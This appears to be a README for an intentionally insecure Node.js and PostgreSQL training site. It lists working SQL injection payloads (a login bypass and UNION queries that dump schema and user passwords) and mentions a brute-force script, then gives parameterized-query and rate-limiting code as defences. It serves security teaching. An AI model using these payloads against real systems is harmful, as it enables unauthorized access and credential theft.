Actually, this website is very insecure, on purpose.
The website is a demonstration of some common attacks on web servers.
- Node.js (including the `node` runtime and `npm`)
- A PostgreSQL server

Tested with:

- Node.js v6.10.3
- PostgreSQL v9.6.3
- Create a database on your PostgreSQL server.
- Run `npm install` in this project directory to install dependencies.
- Configure `config.js` so that the application can connect to your PostgreSQL database.
- Run `node src/model/schema.js` to initialize your database.
- Run `node src/server.js` to start the server.
- The web server listens on port `8080`.
- Enjoy!
Here are the vulnerabilities you can try on this website:

- SQL injection on the login form: type `admin' --` as the username and anything as the password. The single quote closes the username literal and `--` turns the rest of the query, including the password check, into a comment, so you are logged in as `admin` without knowing the password.
- SQL injection on the posts API (schema discovery): send a GET request to `http://127.0.0.1:8080/api/posts?id=-1 UNION SELECT 1, table_name, column_name FROM information_schema.columns WHERE table_schema = 'public';`. You can do this simply by typing the URL into your browser's address bar. The id `-1` matches no real post, so the response contains only the UNIONed rows, which list every table and column in the `public` schema. The UNIONed `SELECT` has to return the same number of columns as the original query, which is why this probe selects exactly three values.
- SQL injection on the posts API (data extraction): send a GET request to `http://127.0.0.1:8080/api/posts?id=-1 UNION SELECT id, username, password FROM users;`. You can do this simply by typing the URL into your browser's address bar. The response contains the rows of the `users` table, including the `password` column.
- Brute-force login: run `node util/brute.js`.
To prevent SQL injection, use parameterized queries (prepared statements), which pg-promise provides.
A prepared statement keeps the SQL command and the data separate: the query text is sent with placeholders and the values are sent alongside it, so client input is never parsed as part of the SQL command. A quote or `--` inside a value is then just data, and a `UNION` in the `id` parameter is just a string that fails to match an integer column.
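As an added example (not the project's own code), the following JavaScript contrasts the vulnerable string-concatenation pattern behind the three injection payloads above with the parameterized form. The column lists and the shape of the demo's queries are assumptions, since the server code is not shown here; the `db` argument stands in for a pg-promise database object, whose `oneOrNone` and `any` methods take the query text and a parameter array separately.

```javascript
'use strict';
// Added example, not code from the demo project. The query shapes below
// (column lists, table names) are assumptions about what the server does.

// --- Vulnerable form: user input is spliced into the SQL text -------------
// With username "admin' --" the quote ends the string literal and "--"
// comments out the password check, so any password logs in as admin.
function vulnerableLoginSql(username, password) {
  return "SELECT id, username FROM users WHERE username = '" + username +
         "' AND password = '" + password + "'";
}

// With id "-1 UNION SELECT id, username, password FROM users" the attacker's
// SELECT is appended to the developer's query. It only works because the
// injected SELECT returns the same number of columns (three) as the original.
function vulnerablePostsSql(id) {
  return 'SELECT id, title, body FROM posts WHERE id = ' + id;
}

// --- Hardened form: constant SQL text, input travels as parameters ---------
// pg-promise (via node-postgres) sends the query text and the values to
// PostgreSQL separately; the values are never parsed as SQL.
const LOGIN_SQL =
  'SELECT id, username FROM users WHERE username = $1 AND password = $2';
const POST_SQL = 'SELECT id, title, body FROM posts WHERE id = $1';

// `db` is a pg-promise database object (or a stand-in with the same methods).
function hardenedLogin(db, username, password) {
  return db.oneOrNone(LOGIN_SQL, [username, password]);
}

function hardenedPost(db, id) {
  // Defence in depth: reject anything that is not an integer before it
  // reaches the database instead of relying on the driver alone.
  if (!/^-?\d+$/.test(String(id))) {
    throw new TypeError('post id must be an integer');
  }
  return db.any(POST_SQL, [Number(id)]);
}

// A recording stand-in for the pg-promise db object, so the hardened
// functions can be exercised offline and the query text inspected.
function recordingDb() {
  const calls = [];
  const record = (sql, params) => {
    calls.push({ sql, params });
    return Promise.resolve(null);
  };
  return { calls, oneOrNone: record, any: record };
}

// Stand-alone demonstration: the vulnerable strings versus the recorded call.
const demoDb = recordingDb();
hardenedLogin(demoDb, "admin' --", 'anything');
console.log(vulnerableLoginSql("admin' --", 'anything'));
console.log(vulnerablePostsSql('-1 UNION SELECT id, username, password FROM users'));
console.log(demoDb.calls[0]);
```

The point to notice is that `demoDb.calls[0].sql` is byte-for-byte `LOGIN_SQL` no matter what the user typed; the payload survives only inside the parameter array, where PostgreSQL treats it as a string value to compare against the `username` column.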
A simple way to slow down brute-force attacks is to limit how many times a user can try to log in within a given time window. rate-limiter is a good middleware for this job. Apply the limit to the login route specifically, and key it on the account being attacked as well as on the client address: a limit keyed only on the address is bypassed by spreading guesses over many addresses, while a limit keyed only on the username lets an attacker lock a victim out by exhausting that account's budget.
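As an added example (not the project's own code, and not the API of the rate-limiter package mentioned above), the following JavaScript implements a minimal fixed-window login limiter of the kind that would stop `util/brute.js`. The attempt budget is tracked per username so that guesses against one account are counted together whatever address they come from; the `now` function is injectable so the window logic can be exercised without waiting. The Express-style `req`/`res`/`next` signature is an assumption about how the demo's routes are written.

```javascript
'use strict';
// Added example, not code from the demo project.

// Builds a limiter allowing `max` attempts per key within each `windowMs`
// window. `now` returns milliseconds and is injectable for testing.
function createLoginLimiter({ max = 5, windowMs = 15 * 60 * 1000, now = Date.now } = {}) {
  const windows = new Map(); // key -> { start, count }

  // Records one attempt for `key` and reports whether it is still allowed.
  function attempt(key) {
    const t = now();
    let w = windows.get(key);
    if (!w || t - w.start >= windowMs) {
      w = { start: t, count: 0 }; // start a fresh window
      windows.set(key, w);
    }
    w.count += 1;
    const allowed = w.count <= max;
    return {
      allowed,
      remaining: Math.max(0, max - w.count),
      retryAfterMs: allowed ? 0 : w.start + windowMs - t,
    };
  }

  // Call after a successful login so a legitimate user who mistyped a few
  // times is not penalised on the next visit. It gives an attacker nothing,
  // since reaching it requires the correct password.
  function reset(key) {
    windows.delete(key);
  }

  // Express-style middleware for the login route. The key is the submitted
  // username (falling back to the client address when there is none), so
  // guesses against one account are throttled regardless of source address.
  // A production deployment would add a second, address-keyed limiter.
  function middleware(req, res, next) {
    const username = (req.body && req.body.username) || '';
    const key = username ? 'user:' + username : 'ip:' + req.ip;
    const r = attempt(key);
    res.setHeader('X-RateLimit-Remaining', String(r.remaining));
    if (!r.allowed) {
      res.setHeader('Retry-After', String(Math.ceil(r.retryAfterMs / 1000)));
      res.status(429).send('Too many login attempts, try again later');
      return;
    }
    next();
  }

  return { attempt, reset, middleware };
}

// Stand-alone demonstration: the sixth guess against "admin" within the
// window is refused.
const demo = createLoginLimiter({ max: 5, windowMs: 60 * 1000 });
for (let i = 1; i <= 6; i++) {
  const r = demo.attempt('user:admin');
  console.log('attempt ' + i + ': ' + (r.allowed ? 'allowed' : 'blocked'));
}
```

Wire it in with `app.post('/login', limiter.middleware, loginHandler)` and call `limiter.reset('user:' + username)` from the handler once the credentials check succeeds. A fixed window is the simplest scheme; it lets a client burst `2 * max` attempts across a window boundary, which a sliding-window or token-bucket counter avoids at the cost of a little more bookkeeping.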
- Node.js Security Checklist: a checklist for developers to prevent security risks on Node.js.
- OWASP Node Goat Project: an example project for developers to learn how common security risks apply to web applications developed using Node.js and how to effectively address them.
- Security Checklist Developers: a general security checklist for backend developers.